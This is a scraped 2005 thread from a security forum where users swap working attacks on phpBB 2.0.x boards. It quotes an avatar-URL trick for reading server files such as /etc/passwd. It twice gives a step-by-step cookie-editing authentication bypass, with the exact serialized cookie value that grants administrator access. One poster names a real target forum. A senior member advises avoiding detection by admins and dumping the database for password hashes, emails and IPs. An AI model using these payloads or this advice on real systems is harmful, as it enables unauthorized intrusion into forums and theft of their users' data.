Waraxe IT Security Portal
Login or Register
November 24, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 71
Members: 0
Total: 71
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> 2.0.11 Arbitrary File Disclosure Vulnerability
Post new topicReply to topic View previous topic :: View next topic
2.0.11 Arbitrary File Disclosure Vulnerability
PostPosted: Tue Apr 05, 2005 9:37 pm Reply with quote
kingspice
Beginner
Beginner
Joined: Apr 05, 2005
Posts: 2




"An attacker can exploit this input validation condition by selecting an avatar from the local machine that meets the board guidelines and can then fill the "Upload Avatar from a URL:" field with the path to an arbitrary file (ex: /etc/passwd). When the avatar is submitted, the destination image of the submitted avatar will contain the contents of the requested file."

Have tried this exploit, however what files can i download that will provide information to me that is useful?
Can download /etc/passwd, however need /etc/shadow to get passwords which the server doesn't allow access to.

Also, are there any better exploits for version 2.0.11?

Kingspice
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 6:40 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




u could use Session Handling Authentication Bypass,
read about this in this forum too ..

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Wed Apr 06, 2005 12:55 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Yeah just use the 2.0.12 exploit. That ll work for 2.0.11:

phpBB 2.0.12 Session Handling Authentication Bypass ..

easy to use exploit ..

** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..

1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:

3- Close the Browser ..

2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example Wink

and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor

3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//

save the cookies.txt..

4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! Very Happy

complete the mission by clicking " Go to Administration Panel "

--------------------------------------------------------------------------------

written by : Ali7
e-mail : ali7@hotmail.co.uk

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Thu May 12, 2005 1:52 am Reply with quote
cas
Beginner
Beginner
Joined: May 12, 2005
Posts: 2




I can't get this exploit working on a 2.0.11 forum ;(

This is my cookies.txt before editing:

Quote:
# HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.

publishers.clickbooth.com FALSE / FALSE 1115970477 directtrack_rotation_integraclick 3
publishers.clickbooth.com FALSE / FALSE 1115948877 universal_adpool_cookie2_1122_24_13060 %2C3%7C1%7C1115862596
getaforum.com FALSE / FALSE 1147398471 phpbb_russ05_data a%3A0%3A%7B%7D
getaforum.com FALSE /phpbb2/ FALSE 1147398471 ForumSetCookie russ05


and this is what is looks like after the edit:

Quote:
# HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.

publishers.clickbooth.com FALSE / FALSE 1115970477 directtrack_rotation_integraclick 3
publishers.clickbooth.com FALSE / FALSE 1115948877 universal_adpool_cookie2_1122_24_13060 %2C3%7C1%7C1115862596
getaforum.com FALSE / FALSE 1147398471 phpbb_russ05_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
getaforum.com FALSE /phpbb2/ FALSE 1147398471 ForumSetCookie russ05


I've also tried replacing the "userid" and "autologinid" with usernames from the forum, without any changes when I reopen the browser..

Using Firefox 1.0.3
View user's profile Send private message
PostPosted: Thu May 12, 2005 6:27 am Reply with quote
devn00b
Regular user
Regular user
Joined: Feb 20, 2005
Posts: 22




They could have manually patched the forums. Its a simple fix realy. My forums still show as .8 but are updated with all the current fixes.
View user's profile Send private message
PostPosted: Thu May 12, 2005 11:32 pm Reply with quote
cas
Beginner
Beginner
Joined: May 12, 2005
Posts: 2




any way to find the real version number?

if anyone wants to give it a try, here's the url:

[removed]
View user's profile Send private message
PostPosted: Fri May 13, 2005 12:48 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Sorry:P but the rules 1 and 1a clearly say:
Quote:
1) No Posting of IP Addresses or Vulnerable WebSites in the forum

1a) When posting an IP address of a machine when discussing an issue should be done as follows. Xxx.xxx.xxx.xxx


If you wish to get someone to help you: email or PM someone and ask them if they could. Then send them the URL if they answer yes.

For all those who have not read the rules I suggest you read them.
http://www.waraxe.us/ftopict-57.html


Thanks
Shai-tan Wink

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Thu Oct 13, 2005 4:05 pm Reply with quote
Michael_Brad
Regular user
Regular user
Joined: Oct 13, 2005
Posts: 5




Hey,

I've been searching for resources of "hacking phpBB" for a loooong time. Good to know that I finally found the method...indeed it is simple. Smile

Right, I want to thank you guys for the help on that, however.....if you could help me a little bit over here I would appreciate it!

Right so I have tried editing my cookies and saving them at a few phpBB message boards...but none of them worked. I eventually found out that the reason as to why it would not work, is because my cookies weren't "edited" properly. When I would "replace the text" and went <File < Save the "changes" would not be saved.

Yeah I know, you probably just figured I know nothing about computers...lol. Well I do know a fair bit, but this one I don't know. So if anyone could help me a bit here as to how "save" the changes I have made to my cookies...would be greatly appreciated. Smile

PS Sorry I had to bring this topic back from the dead...
View user's profile Send private message
PostPosted: Thu Oct 13, 2005 11:48 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




see the permission of the file , are you have some rights to write the file ?
or make ur self someone has right such as administrator in windows or root in *nix

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Fri Oct 14, 2005 5:42 pm Reply with quote
Michael_Brad
Regular user
Regular user
Joined: Oct 13, 2005
Posts: 5




Bleh just ignore me Embarassed I figured it all out now...AND made it work! Very Happy

Question btw...if I simply have a look at the admin panel, but I do NOT make any changes, then I will not be caught. Is that correct? Cheers
View user's profile Send private message
PostPosted: Sat Oct 15, 2005 11:03 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




This really depends on how many admins there are and what addons they have on the board. Because if they are in the admin panel at the same time and see one of the other admins logged on under a different to usual IP then...... if they have a 3rd party admin or IP logger addon then they may catch you that way. Other wise I would just back up their database and get more md5s and email addys and IPs and websites and anything else. Also veiw whats in the admin forum for the hell of it.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Sat Oct 15, 2005 3:58 pm Reply with quote
Michael_Brad
Regular user
Regular user
Joined: Oct 13, 2005
Posts: 5




Cheers for the info...Yeah will not be using this when an admin is already browsing the boards. Now all I need to do is wait for the exploit on 2.0.18 version/phpBB to be released. Twisted Evil

Someone told me btw that he was able to hack a phpBB forum, even if it was patched. Makes me wonder how that is possible - but cheers for the responses anyhow. Wink
View user's profile Send private message
PostPosted: Wed Mar 08, 2006 10:04 am Reply with quote
Musaaf
Beginner
Beginner
Joined: Mar 08, 2006
Posts: 3




shai-tan wrote:
Yeah just use the 2.0.12 exploit. That ll work for 2.0.11:

phpBB 2.0.12 Session Handling Authentication Bypass ..

easy to use exploit ..

** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..

1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:

3- Close the Browser ..

2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example Wink

and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor

3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//

save the cookies.txt..

4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! Very Happy

complete the mission by clicking " Go to Administration Panel "

--------------------------------------------------------------------------------

written by : Ali7
e-mail : ali7@hotmail.co.uk


I have tried this on a site but it did not work maybe its the latest phpbb?

are there any exploits for the new version
View user's profile Send private message
2.0.11 Arbitrary File Disclosure Vulnerability
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.035 Seconds